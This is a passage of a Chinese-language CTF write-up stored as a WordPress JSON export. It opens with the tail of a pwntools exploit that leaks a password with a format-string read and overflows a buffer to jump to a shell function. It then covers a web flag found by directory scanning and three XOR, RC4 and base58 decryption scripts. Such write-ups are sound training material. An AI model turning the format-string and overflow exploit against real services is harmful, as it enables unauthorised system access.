p.sendafter(a,b)<br>def sla(a,b):#\u76f4\u5230\u63a5\u6536\u5230a\u540e\u53d1\u9001b\u5e26\\n<br>    p.sendlineafter(a,b)<br>def r():#\u63a5\u6536<br>    p.recv()<br>def rl(a):#\u7b49\u5f85\u5230\u63a5\u6536\u5230a<br>    return p.recvuntil(a)<br>def get_32():#32\u4f4d\u63a5\u6536\u5730\u5740<br>    return u32(p.recvuntil(b'\\xf7')[-4:])<br>def get_64():#64\u4f4d\u63a5\u6536\u5730\u5740<br>    return u64(p.recvuntil(b'\\x7f')[-6:].ljust(8, b'\\x00'))<br>def m():#\u8c03\u7528gdb<br>    gdb.attach(p)<br>def dr(a):#\u622a\u53d6\u5230a\u7ec8\u6b62<br>    return eval(p.recvuntil(a,drop=True))<br>def pr(a):<br>    print(hex(a))<br>\u200b<br>###############################################<br>len=0X20+8<br>sh=0x401265<br>sla(b'Password: ',b'supersecureuser')<br>\u200b<br>\u200b<br>sla(b'Write Something\\n',b'%13$s')<br>adc=p.recvline(keepends=False)<br>print(f'adc=',adc)<br>sla(b'Password: ',adc)<br>payload=b'a'*len+p64(sh)<br>sla(b'Note: \\n',payload)<br>p.interactive()#\u4e0e\u7a0b\u5e8f\u4ea4\u4e92<\/pre>\n\n\n\n<h1 class=\"wp-block-heading\">Web<\/h1>\n\n\n\n<h2 class=\"wp-block-heading\">ezLaravel-ucsc<\/h2>\n\n\n\n<p class=\"wp-block-paragraph\">dirsearch\u626b\u63cf\u76ee\u5f55\u626b\u51faflag.php\u6587\u4ef6<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"789\" src=\"https:\/\/www.hurkin.top\/wp-content\/uploads\/2025\/04\/1745146456-\u56fe\u7247-1024x789.png\" alt=\"\" class=\"wp-image-254\" srcset=\"https:\/\/www.hurkin.top\/wp-content\/uploads\/2025\/04\/1745146456-\u56fe\u7247-1024x789.png 1024w, https:\/\/www.hurkin.top\/wp-content\/uploads\/2025\/04\/1745146456-\u56fe\u7247-300x231.png 300w, https:\/\/www.hurkin.top\/wp-content\/uploads\/2025\/04\/1745146456-\u56fe\u7247-768x592.png 768w, https:\/\/www.hurkin.top\/wp-content\/uploads\/2025\/04\/1745146456-\u56fe\u7247.png 1233w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<p class=\"wp-block-paragraph\">\u76f4\u63a5\u8bbf\u95ee\u5c31\u662fflag<\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"601\" height=\"172\" src=\"https:\/\/www.hurkin.top\/wp-content\/uploads\/2025\/04\/1745146461-\u56fe\u7247.png\" alt=\"\" class=\"wp-image-255\" srcset=\"https:\/\/www.hurkin.top\/wp-content\/uploads\/2025\/04\/1745146461-\u56fe\u7247.png 601w, https:\/\/www.hurkin.top\/wp-content\/uploads\/2025\/04\/1745146461-\u56fe\u7247-300x86.png 300w\" sizes=\"auto, (max-width: 601px) 100vw, 601px\" \/><\/figure>\n\n\n\n<h1 class=\"wp-block-heading\">reverse<\/h1>\n\n\n\n<h2 class=\"wp-block-heading\">easy-re-ucsc<\/h2>\n\n\n\n<p class=\"wp-block-paragraph\">\u4e00\u4e2a\u7b80\u5355\u7684\u5f02\u6216\u52a0\u5bc6\uff0c\u76f4\u63a5\u5199\u51fa\u89e3\u5bc6\u811a\u672c<\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"869\" height=\"654\" src=\"https:\/\/www.hurkin.top\/wp-content\/uploads\/2025\/04\/1745146466-\u56fe\u7247.png\" alt=\"\" class=\"wp-image-256\" srcset=\"https:\/\/www.hurkin.top\/wp-content\/uploads\/2025\/04\/1745146466-\u56fe\u7247.png 869w, https:\/\/www.hurkin.top\/wp-content\/uploads\/2025\/04\/1745146466-\u56fe\u7247-300x226.png 300w, https:\/\/www.hurkin.top\/wp-content\/uploads\/2025\/04\/1745146466-\u56fe\u7247-768x578.png 768w\" sizes=\"auto, (max-width: 869px) 100vw, 869px\" \/><\/figure>\n\n\n\n<pre class=\"wp-block-preformatted\">encrypted = \"n=&lt;;:h2&lt;'?8:?'9hl9'h:l&gt;'2&gt;&gt;2&gt;hk=&gt;;:?\"<br>key = 10<br>\u200b<br>decrypted = [chr(ord(c) ^ key) for c in encrypted]<br>flag = ''.join(decrypted)<br>print(flag)<\/pre>\n\n\n\n<h2 class=\"wp-block-heading\">EZ-debug-ucsc<\/h2>\n\n\n\n<p class=\"wp-block-paragraph\">\u4e00\u4e2arc4\u52a0\u5bc6\uff0c\u53ef\u4ee5\u5229\u7528\u52a8\u8c03\u81ea\u89e3\u5bc6\uff0c\u4e5f\u53ef\u4ee5\u76f4\u63a5\u7528\u811a\u672c<\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"940\" height=\"710\" src=\"https:\/\/www.hurkin.top\/wp-content\/uploads\/2025\/04\/1745146474-\u56fe\u7247.png\" alt=\"\" class=\"wp-image-257\" srcset=\"https:\/\/www.hurkin.top\/wp-content\/uploads\/2025\/04\/1745146474-\u56fe\u7247.png 940w, https:\/\/www.hurkin.top\/wp-content\/uploads\/2025\/04\/1745146474-\u56fe\u7247-300x227.png 300w, https:\/\/www.hurkin.top\/wp-content\/uploads\/2025\/04\/1745146474-\u56fe\u7247-768x580.png 768w\" sizes=\"auto, (max-width: 940px) 100vw, 940px\" \/><\/figure>\n\n\n\n<p class=\"wp-block-paragraph\">\u5bc6\u6587\u5bc6\u94a5\u5df2\u7ecf\u7ed9\u51fa\uff0c\u76f4\u63a5\u5957\u811a\u672c<\/p>\n\n\n\n<pre class=\"wp-block-preformatted\">def rc4_init(key):<br>    S = list(range(256))<br>    j = 0<br>    for i in range(256):<br>        j = (j + S[i] + key[i % len(key)]) % 256<br>        S[i], S[j] = S[j], S[i]<br>    return S<br>\u200b<br>def rc4_crypt(data, key):<br>    S = rc4_init(key)<br>    i = j = 0<br>    result = bytearray()<br>    for byte in data:<br>        i = (i + 1) % 256<br>        j = (j + S[i]) % 256<br>        S[i], S[j] = S[j], S[i]<br>        k = S[(S[i] + S[j]) % 256]<br>        result.append(byte ^ k)<br>    return bytes(result)<br>\u200b<br># \u52a0\u5bc6\u6570\u636e<br>encrypted = [<br>    0x89B83EC0E7A3CF8, 0x3F0EA83858C85F6A, <br>    0xAB8A1E39811B5F22, 0x649F307A6475E9B1,<br>    0xAB7BBD90<br>]<br>\u200b<br># \u8f6c\u6362\u4e3a\u5b57\u8282\u5e8f\u5217\uff08\u5c0f\u7aef\u5e8f\uff09<br>encrypted_bytes = b''.join(x.to_bytes(8, 'little') for x in encrypted[:4])<br>encrypted_bytes += encrypted[4].to_bytes(4, 'little')<br>\u200b<br># \u89e3\u5bc6\uff08RC4\u52a0\u5bc6=\u89e3\u5bc6\uff09<br>key = b\"UCSC\"<br>decrypted = rc4_crypt(encrypted_bytes, key)<br>\u200b<br>print(\"Decrypted data:\", decrypted)<br>print(\"Hex:\", decrypted.hex())<\/pre>\n\n\n\n<h2 class=\"wp-block-heading\">simplere-re-ucsc<\/h2>\n\n\n\n<p class=\"wp-block-paragraph\">\u5148\u67e5\u770b\u6587\u4ef6\u53d1\u73b0\u6709\u58f3\uff0c\u4f46\u662f\u8bc6\u522b\u4e0d\u51fa\uff0c\u4e8e\u662f\u7528010\u67e5\u770b\uff0c\u5c06CTF\u6539\u4e3aUPX\u7136\u540e\u4fdd\u5b58<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"674\" src=\"https:\/\/www.hurkin.top\/wp-content\/uploads\/2025\/04\/1745146481-\u56fe\u7247-1024x674.png\" alt=\"\" class=\"wp-image-258\" srcset=\"https:\/\/www.hurkin.top\/wp-content\/uploads\/2025\/04\/1745146481-\u56fe\u7247-1024x674.png 1024w, https:\/\/www.hurkin.top\/wp-content\/uploads\/2025\/04\/1745146481-\u56fe\u7247-300x198.png 300w, https:\/\/www.hurkin.top\/wp-content\/uploads\/2025\/04\/1745146481-\u56fe\u7247-768x506.png 768w, https:\/\/www.hurkin.top\/wp-content\/uploads\/2025\/04\/1745146481-\u56fe\u7247.png 1083w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<p class=\"wp-block-paragraph\">\u4fdd\u5b58\u540e\u518d\u7528upx\u8131\u58f3<\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"890\" height=\"582\" src=\"https:\/\/www.hurkin.top\/wp-content\/uploads\/2025\/04\/1745146486-\u56fe\u7247.png\" alt=\"\" class=\"wp-image-259\" srcset=\"https:\/\/www.hurkin.top\/wp-content\/uploads\/2025\/04\/1745146486-\u56fe\u7247.png 890w, https:\/\/www.hurkin.top\/wp-content\/uploads\/2025\/04\/1745146486-\u56fe\u7247-300x196.png 300w, https:\/\/www.hurkin.top\/wp-content\/uploads\/2025\/04\/1745146486-\u56fe\u7247-768x502.png 768w\" sizes=\"auto, (max-width: 890px) 100vw, 890px\" \/><\/figure>\n\n\n\n<p class=\"wp-block-paragraph\">\u4e00\u4e2abase58\u53d8\u8868\u7684\u52a0\u5bc6\uff0c\u7136\u540e\u518d\u5f02\u6216<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"613\" src=\"https:\/\/www.hurkin.top\/wp-content\/uploads\/2025\/04\/1745146492-\u56fe\u7247-1024x613.png\" alt=\"\" class=\"wp-image-260\" srcset=\"https:\/\/www.hurkin.top\/wp-content\/uploads\/2025\/04\/1745146492-\u56fe\u7247-1024x613.png 1024w, https:\/\/www.hurkin.top\/wp-content\/uploads\/2025\/04\/1745146492-\u56fe\u7247-300x180.png 300w, https:\/\/www.hurkin.top\/wp-content\/uploads\/2025\/04\/1745146492-\u56fe\u7247-768x460.png 768w, https:\/\/www.hurkin.top\/wp-content\/uploads\/2025\/04\/1745146492-\u56fe\u7247.png 1129w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<p class=\"wp-block-paragraph\">\u5199\u51fa\u811a\u672c<\/p>\n\n\n\n<pre class=\"wp-block-preformatted\">def main():<br>\u200b<br>    buf2 = [0x72,0x7A,0x32,0x48,0x34,0x4E,0x3F,0x3A,<br>            0x42,0x33,0x47,0x69,0x75,0x63,0x7C,0x7D,<br>            0x77,0x62,0x65,0x64,0x7B,0x6F,0x62,0x50,<br>            0x73,0x2B,0x68,0x6C,0x67,0x47,0x69,0x15,<br>            0x42,0x75,0x65,0x40,0x76,0x61,0x56,0x41,<br>            0x11,0x44,0x7F,0x19,0x65,0x4C,0x40,0x48,<br>            0x65,0x60,0x01,0x40,0x50,0x01,0x61,0x6F,<br>            0x69,0x57]<br>\u200b<br>    transposed_chars = []<br>    for i in range(len(buf2)):<br>        transposed_char = buf2[i] ^ (i + 1)<br>        transposed_chars.append(transposed_char)<br>    str_bytes = transposed_chars[::-1]<br>\u200b<br>\u200b<br>    CUSTOM = \"wmGbyFp7WeLh2XixZUYsS5cVv1ABRrujdzQ4Kfa6gP8HJN3nTCktqEDo9M\"<br>\u200b<br>    v9 = 0<br>    for b in str_bytes:<br>        if b == ord(CUSTOM[0]):<br>            v9 += 1<br>        else:<br>            break<br>\u200b<br>    remaining_bytes = str_bytes[v9:]<br>\u200b<br>    block_values = []<br>    for b in remaining_bytes:<br>        try:<br>            idx = CUSTOM.index(chr(b))<br>            block_values.append(idx)<br>        except ValueError:<br>            print(f\"Error\")<br>            return<br>\u200b<br>    N = 0<br>    for i, val in enumerate(reversed(block_values)):<br>        N += val * (58 ** i)<br>\u200b<br>    bytes_list = []<br>    while N &gt; 0:<br>        bytes_list.append(N % 256)<br>        N = N \/\/ 256<br>    bytes_list = bytes_list[::-1]<br>\u200b<br>    original = bytes([0] * v9 + bytes_list)<br>\u200b<br>    print(\"Flag:\", original.decode('latin-1', errors='ignore'))<br>\u200b<br>if __name__ == \"__main__\":<br>    main()<\/pre>\n","protected":false},"excerpt":{"rendered":"<p>Misc three-ucsc part1\u76f2\u6c34\u53708f02d3e7 part2\u4e8c\u8fdb\u5236\u8f6c\u4e00\u4e0b\uff0c\u7136\u540ebase64\uff0c\u83ab\u65af\u89e3\u51fa\u6765 -ce89 &#8230;<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"emotion":"","emotion_color":"","title_style":"","license":"","_jetpack_memberships_contains_paid_content":false,"footnotes":""},"categories":[1],"tags":[],"class_list":["post-231","post","type-post","status-publish","format-standard","hentry","category-some-competition"],"jetpack_featured_media_url":"","jetpack_sharing_enabled":true,"_links":{"self":[{"href":"https:\/\/www.hurkin.top\/index.php\/wp-json\/wp\/v2\/posts\/231","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.hurkin.top\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.hurkin.top\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.hurkin.top\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/www.hurkin.top\/index.php\/wp-json\/wp\/v2\/comments?post=231"}],"version-history":[{"count":1,"href":"https:\/\/www.hurkin.top\/index.php\/wp-json\/wp\/v2\/posts\/231\/revisions"}],"predecessor-version":[{"id":261,"href":"https:\/\/www.hurkin.top\/index.php\/wp-json\/wp\/v2\/posts\/231\/revisions\/261"}],"wp:attachment":[{"href":"https:\/\/www.hurkin.top\/index.php\/wp-json\/wp\/v2\/media?parent=231"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.hurkin.top\/index.php\/wp-json\/wp\/v2\/categories?post=231"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.hurkin.top\/index.php\/wp-json\/wp\/v2\/tags?post=231"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}